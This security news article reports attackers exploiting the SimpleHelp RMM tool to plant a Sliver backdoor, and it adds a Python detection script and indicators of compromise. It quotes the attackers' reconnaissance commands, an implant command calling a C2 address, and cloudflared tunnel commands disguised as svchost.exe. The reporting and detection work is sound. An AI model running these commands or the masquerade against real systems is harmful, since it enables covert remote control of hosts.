Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems


Feb 7, 2025 - 13:31

Hackers have been exploiting vulnerabilities in the SimpleHelp remote monitoring and management (RMM) tool to deploy malware, including the Sliver backdoor, on compromised systems.

This attack highlights the importance of keeping software up to date and implementing robust security measures to prevent such exploits.

The attack begins with the threat actor connecting to the endpoint through the vulnerable SimpleHelp RMM client, which runs on the host under the name JWrapper-Remote Access.

In one instance, the connection was made from the IP address 194.76.227[.]171, which is based in Estonia and hosts a SimpleHelp Server on port 80.

Data associated with IP 194.76.227[.]171 (Source – Field Effect)

Researchers at Field Effect found that once connected, the threat actor executes a series of discovery commands through the RMM session to enumerate system details, user accounts, domain trusts, and network shares, and to check whether CrowdStrike Falcon is running on the host.

These commands include:

  • ipconfig /all
  • sc query
  • schtasks
  • driverquery
  • nltest /dclist:
  • nltest /domain_trusts
  • net share
  • net use
  • tasklist
  • findstr CSFalcon
  • quser
  • net group "domain admins" /domain
  • hostname
  • ping

The attackers then deploy the Sliver backdoor, an implant from the open-source Sliver post-exploitation framework written in Go, which provides process injection, service tampering, command execution, and file system manipulation. The implant is configured to connect to the IP address 45.9.148[.]136 on port 443, skipping TLS certificate validation, using the command:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert

Data associated with IP 45.9.148[.]136 (Source – Field Effect)

Lateral Movement and Additional Payloads

In addition to deploying the Sliver backdoor, the attackers installed a cloudflared tunnel, renaming the binary to svchost.exe and placing it in C:\Windows so that it blends in with the legitimate Windows service host. The genuine svchost.exe lives only in C:\Windows\System32 (and SysWOW64), so a file by that name in the C:\Windows root is itself a strong indicator. The tunnel gives the attacker an outbound, encrypted channel to Cloudflare's edge that does not need an inbound firewall exception. It was installed as a service with cloudflared's own service-install syntax:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

Followed by:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)

Data associated with IP 45.9.149[.]112 (Source – Field Effect)
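The discovery-command burst, the svchost.exe masquerade and the C2 addresses above can be turned into a small triage script. The following is an added example written for this article, not code from Field Effect or SimpleHelp; it runs over a handful of constructed, Sysmon-style process-creation and network-connection events (field names, the JWrapper-Remote Access executable path and the burst threshold are assumptions) and flags the three behaviours the article describes.

```python
"""Triage rules for the SimpleHelp RMM intrusion pattern described in the
article (added example; events and field names are constructed)."""
import ntpath
from datetime import datetime, timedelta

# IoCs from the article, with the defanging brackets removed for matching.
C2_IPS = {"194.76.227.171", "45.9.148.136", "45.9.149.112"}

# Executables behind the article's discovery command list.
DISCOVERY_BINS = {"ipconfig", "sc", "schtasks", "driverquery", "nltest", "net",
                  "tasklist", "findstr", "quser", "hostname", "ping"}

# The only directories the real Windows svchost.exe runs from.
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Substring matched against the parent image; the exact binary name and
# install path of the SimpleHelp client are assumptions.
SIMPLEHELP_MARKER = "jwrapper-remote access"

BURST_MIN_DISTINCT = 5            # distinct discovery tools ...
BURST_WINDOW = timedelta(minutes=10)  # ... within this window


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def command_binary(cmdline):
    """Lowercase base name (without .exe) of the program in a command line,
    e.g. '"C:\\Windows\\System32\\net.exe" group ...' -> 'net'."""
    s = cmdline.strip()
    if s.startswith('"'):
        first = s[1:s.find('"', 1)]
    else:
        first = s.split()[0] if s else ""
    name = ntpath.basename(first).lower()
    return name[:-4] if name.endswith(".exe") else name


def is_masqueraded_svchost(image_path):
    """True when something named svchost.exe runs outside System32/SysWOW64,
    as the renamed cloudflared binary at c:\\Windows\\svchost.exe did."""
    p = image_path.lower()
    if ntpath.basename(p) != "svchost.exe":
        return False
    return ntpath.dirname(p) not in LEGIT_SVCHOST_DIRS


def discovery_bursts(events):
    """Parents matching the SimpleHelp client that spawn >= BURST_MIN_DISTINCT
    distinct discovery tools inside BURST_WINDOW."""
    by_parent = {}
    for e in events:
        if e["type"] != "process" or SIMPLEHELP_MARKER not in e["parent_image"].lower():
            continue
        b = command_binary(e["cmdline"])
        if b in DISCOVERY_BINS:
            by_parent.setdefault(e["parent_image"], []).append((_ts(e["ts"]), b))
    findings = []
    for parent, seen in by_parent.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            window = {b for t, b in seen[i:] if t - t0 <= BURST_WINDOW}
            if len(window) >= BURST_MIN_DISTINCT:
                findings.append({"rule": "simplehelp_discovery_burst",
                                 "parent": parent, "binaries": sorted(window)})
                break
    return findings


def masqueraded_processes(events):
    return [{"rule": "svchost_outside_system32", "image": e["image"], "cmdline": e["cmdline"]}
            for e in events if e["type"] == "process" and is_masqueraded_svchost(e["image"])]


def c2_connections(events):
    return [{"rule": "known_c2_ip", "image": e["image"],
             "dest": f'{e["dest_ip"]}:{e["dest_port"]}'}
            for e in events if e["type"] == "network" and e["dest_ip"] in C2_IPS]


def triage(events):
    return discovery_bursts(events) + masqueraded_processes(events) + c2_connections(events)


# Constructed sample telemetry (not from the report). SH is an assumed client path.
SH = r"C:\Program Files\JWrapper-Remote Access\JWrapper-Remote Access.exe"
SAMPLE_EVENTS = [
    {"type": "process", "ts": "2025-02-01 10:00:01", "parent_image": SH,
     "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"type": "process", "ts": "2025-02-01 10:00:05", "parent_image": SH,
     "image": r"C:\Windows\System32\sc.exe", "cmdline": "sc query"},
    {"type": "process", "ts": "2025-02-01 10:00:09", "parent_image": SH,
     "image": r"C:\Windows\System32\nltest.exe", "cmdline": "nltest /dclist:"},
    {"type": "process", "ts": "2025-02-01 10:00:12", "parent_image": SH,
     "image": r"C:\Windows\System32\net.exe", "cmdline": 'net group "domain admins" /domain'},
    {"type": "process", "ts": "2025-02-01 10:00:20", "parent_image": SH,
     "image": r"C:\Windows\System32\findstr.exe", "cmdline": "findstr CSFalcon"},
    {"type": "process", "ts": "2025-02-01 10:03:00", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},  # benign
    {"type": "process", "ts": "2025-02-01 10:04:10", "parent_image": SH,
     "image": r"C:\Windows\svchost.exe", "cmdline": r"c:\Windows\svchost.exe tunnel run --token <redacted>"},
    {"type": "network", "ts": "2025-02-01 10:04:30", "image": r"C:\Users\Public\agent.exe",
     "dest_ip": "45.9.148.136", "dest_port": 443},
    {"type": "network", "ts": "2025-02-01 10:05:00", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "93.184.216.34", "dest_port": 443},  # benign
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

Against the sample events the script raises three findings: the five-tool discovery burst under the SimpleHelp client, the svchost.exe running from C:\Windows, and agent.exe talking to 45.9.148.136:443; the legitimate svchost.exe under System32 and the browser connection are not flagged. The burst rule keys on the parent process rather than on any single command because each of these tools is common on its own; it is the cluster under an RMM client that is unusual.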

Organizations using SimpleHelp RMM can protect against these attacks by keeping SimpleHelp and all other remote access tools patched to current versions.

Beyond patching, they should restrict remote access to trusted IP ranges, require multi-factor authentication on the RMM, monitor network traffic and logs for connections to the indicators below, and regularly review administrative accounts for unauthorized additions.

Taken together, these steps significantly reduce exposure to this kind of attack and limit what an intruder can do with a compromised RMM session.

Indicators of Compromise (IoCs)

  • IP addresses: 194.76.227[.]171, 45.9.148[.]136, 45.9.149[.]112
  • Hashes: 385a826b9f7e72b870a92f1901d9d354 (MD5), EC43ED845102760265ED6343EF1FCEF696588905 (SHA1), 15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49 (SHA256)
  • JA3 Hash: d6828e30ab66774a91a96ae93be4ae4c


The post Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems appeared first on Cyber Security News.